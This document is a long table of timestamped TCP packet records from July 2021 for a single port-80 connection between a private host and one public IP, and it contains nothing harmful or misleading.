Jul 12, 2021 10:29:48.991738081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.991827011 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.992022038 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.992042065 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.992067099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.992105961 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.992126942 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.992136002 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.992156982 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.992206097 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.992254019 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.992271900 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.992338896 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.992412090 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.992430925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.992479086 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.992485046 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.992564917 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.992583990 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.992599010 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.992607117 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.992641926 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.992702961 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.992722034 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.992739916 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.992755890 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.992763996 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.992779970 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.992799997 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.992805004 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.992845058 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.992872000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.993181944 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.993242025 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.993271112 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.993289948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.993325949 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.993375063 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.993392944 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.993432999 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.993467093 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.993488073 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.993526936 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.993535042 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.993554115 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.993591070 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.993710995 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.993729115 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.993745089 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.993761063 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.993769884 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.993786097 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.993802071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.993813992 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.993837118 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.994122028 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.994240046 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.994257927 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.994273901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.994296074 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.994323969 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.994406939 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.994455099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.994496107 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.994502068 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.994519949 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.994538069 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.994553089 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.994560957 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.994580030 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.994596958 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.994606018 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.994621992 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.994637012 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.994652987 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.994659901 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.994676113 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.994689941 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.994777918 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.994796038 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.994803905 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.994847059 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.995101929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.995282888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.995302916 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.995326996 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.995414972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.995434046 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.995450020 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.995465994 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.995475054 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.995491982 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.995502949 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.995517969 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.995526075 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.995542049 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.995584011 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.995620012 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.995803118 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.995820999 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.995837927 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.995852947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.995865107 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.995893002 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.996283054 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.996301889 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.996318102 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.996330976 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.996342897 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.996366978 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.996454954 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.996474028 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.996490955 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.996506929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.996515036 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.996530056 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.996545076 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.996553898 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.996567011 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.996576071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.996611118 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.996663094 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.996756077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.996774912 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.996789932 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.996798038 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.996829033 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.997016907 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.997035980 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.997051954 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.997068882 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.997088909 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.997113943 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.997425079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.997443914 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.997462034 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.997478008 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.997488976 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.997504950 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.997522116 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.997529984 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.997616053 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.997633934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.997649908 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.997658014 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.997690916 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.997724056 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.997764111 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.997773886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.997791052 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.997807980 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.997823000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.997831106 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.997864008 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.997996092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.998234034 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.998254061 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.998270035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.998286009 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.998295069 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.998332977 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.998367071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.998388052 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.998408079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.998414993 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.998431921 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.998449087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.998466015 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.998491049 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.998513937 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.998532057 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.998579025 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.998604059 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.998621941 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.998644114 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.998967886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.998986959 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.999003887 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.999063015 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.999108076 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.999160051 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.999181986 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.999200106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.999258041 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.999285936 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.999305964 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.999322891 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.999355078 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.999375105 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.999387026 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.999404907 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.999420881 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.999454021 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.999486923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.999507904 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.999526978 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.999535084 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.999571085 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.999980927 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.000001907 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.000019073 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.000035048 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.000067949 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.000195026 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.000214100 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.000222921 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.000240088 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.000286102 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.000333071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.000351906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.000381947 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.000428915 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.000447989 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.000466108 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.000482082 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.000490904 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.000508070 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.000524044 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.000541925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.000560045 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.000569105 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.000582933 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.000622988 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.000940084 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.000988960 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.001008034 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.001028061 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.001033068 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.001064062 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.001137972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.001156092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.001173019 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.001193047 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.001234055 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.001251936 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.001271963 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.001287937 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.001298904 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.001316071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.001322985 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.001338005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.001353979 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.001373053 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.001391888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.001401901 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.001858950 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.001878023 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.001928091 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.002131939 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.002166986 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.002186060 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.002216101 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.002233028 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.002250910 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.002269983 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.002288103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.002306938 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.002315044 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.002341986 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.002351046 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.002367020 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.002383947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.002401114 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.002409935 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.002424955 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.002434969 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.002496958 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.002533913 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.002962112 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.002983093 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.003036976 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.003046989 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.003066063 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.003108025 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.003169060 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.003187895 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.003202915 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.003220081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.003226995 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.003252029 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.003279924 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.003401041 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.003422022 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.003437996 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.003446102 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.003487110 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.003593922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.003612995 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.003653049 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.003755093 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.003772974 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.003788948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.003804922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.003837109 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.003870964 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.003882885 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.004069090 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.004090071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.004106045 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.004121065 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.004131079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.004148006 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.004162073 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.004175901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.004204988 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.004250050 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.004285097 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.004333019 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.004403114 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.004421949 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.004435062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.004448891 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.004463911 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.004482031 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.004489899 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.004544020 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.004561901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.004992008 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.005033970 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.005060911 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.005079985 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.005096912 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.005112886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.005129099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.005147934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.005156994 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.005176067 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.005192995 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.005201101 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.005218029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.005234003 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.005240917 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.005256891 CEST	80	49755	47.254.186.176	192.168.2.3
